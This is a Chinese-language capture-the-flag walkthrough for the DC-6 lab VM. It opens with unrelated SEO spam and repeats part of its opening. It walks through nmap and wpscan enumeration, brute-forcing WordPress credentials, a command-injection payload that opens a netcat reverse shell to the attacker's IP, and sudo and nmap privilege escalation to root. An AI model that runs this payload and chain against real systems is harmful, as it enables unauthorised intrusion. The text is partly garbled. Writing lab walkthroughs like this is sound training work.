深圳SEO网站建设优化,南山网站多少钱,舆情网站直接打开怎么弄,深圳住房与建设局官网一、搭建环境
kali充当攻击机 ip地址是#xff1a;192.168.200.14 DC-6充当靶机 #xff1a; IP地址暂时未知
注意#xff1a;让两台机器的使用同一种网络适配器
二、信息收集
1.探索同网段存活的主机、
①第一种方法
arp-scan -l②第二种方法
netdiscover -i eth0 -…一、搭建环境
kali充当攻击机 ip地址是192.168.200.14 DC-6充当靶机 IP地址暂时未知
注意让两台机器的使用同一种网络适配器
二、信息收集
1.探索同网段存活的主机、
①第一种方法
arp-scan -l②第二种方法
netdiscover -i eth0 -r 192.168.200.0/24③第三种方法
nmap -sP 192.168.200.0/24 -T4 2、开放端口信息
nmap -sS -A 192.168.200.7 -p 1-6553580端口和22端口开放登录网页 应该是被重定向在kali当中找到hosts文件将192.168.200.7 wordy的关系写入进去
刷新网页后看到网页使用的是wordpress cms 该靶机的CMS系统为wordpress5.1.1 根据CMS版本思路 第一利用目录扫描工具寻找该CMS的后台管理系统然后再爆破密码和账号进入后台管理系统寻找可利用的点。 利用kali工具dirb,发现后台目录
dirb http://192.168.200.7/ 后台界面
3、后台爆破
继续爆破账号密码使用针对该CMS的账号爆破工具wpscan猜解密码
wpscan --url http://wordy -e u
#指定url枚举其中的用户名将以上用户名保存在一个新的文件当中user.txt
cewl根据本文生成密码然后再利用爆破工具暴力破解 提示信息 提示用kali自带的字典rockyou.txt导出包含k01的密码导出来的字典爆破没解压的先解压我之前解压过了
cat /usr/share/wordlists/rockyou.txt | grep k01 pwd.txt 账号和密码都有了开始爆破
wpscan --url wordy -U user.txt -P pwd.txt账号**mark ** 密码helpdesk01 第二在网络上搜索该版本的漏洞或使用searchsploitmsfconsole等工具寻找漏洞及利用方法。
登陆后台
三、漏洞探测
这里寻找到两个线索 第一:该网站使用了activity monitor工具。 第二在activity monitor目录的tools一栏存在可注入的点 根据这两个线索本文又有两个思路 第一既然会回传用户的输入到后台解析那么是否可以修改数据包达到我们的目的呢可以利用BP抓包测试。 第二:利用前文提到的漏洞扫描工具对activity monitor进行扫描寻找历史漏洞。
利用第一个思路输入qquhu.com点击lookup BURP抓包测试发现管道符后面的whoami运行了。说明此处存在漏洞。.
反弹shell
利用该漏洞反弹一个shell。 首先在kali虚拟机上开启监听
nc -lvvp 6666将包改成 qq.com | nc -e /bin/bash 192.168.200.14 6666 # kali的IP地址 执行成功 利用python开启交互模式。输入命令
python -c import pty;pty.spawn(/bin/bash)打开home目录查找新的线索 在mark目录下存在一个things-to-do文件发现了graham的账号密码 然后登陆graham的账号密码登陆失败该靶机还开启了22端口因此尝试ssh登录。
ssh graham192.168.200.7提权
sudo -l #尝试sudo -l j免密登录
User graham may run the following commands on dc-6:(jens) NOPASSWD: /home/jens/backups.sh
# 看看当前用户拥有的权限可以对backups.sh执行写操作cd /home/jens
# 写入/bin/bash执行切换到jens的shell
echo /bin/bash backups.sh
sudo -u jens ./backups.sh
# 发现可以以root权限执行nmapsudo -l
User jens may run the following commands on dc-6:(root) NOPASSWD: /usr/bin/nmap
#发现可以用root权限执行nmapnmap在早期版本是可以用来提权的将提权代os.execute(/bin/sh)
写入一个文件中。echo os.execute(/bin/bash) getshell
sudo nmap --scriptgetshell进入/home/jens目录打开backups.sh文件里面是一个压缩命令行说明该文件可以运行。 可以在该文件中添加/bin/bash语句则可以打开jens的shell了。
echo /bin/bash backups.sh #在文件中添加命令行
sudo ./backups.sh #运行失败因为此时是graham哟用户
sudo -u jens ./backups.sh #-u 指定用户jens可以免密码运行root权限nmapnmap可以运行文件
nmap提权以root的权限用nmap执行这个脚本打开root shell的文件再让nmap执行
echo os.execute(/bin/bash) getshell
sudo nmap --scriptgetshell在root目录下发现flag
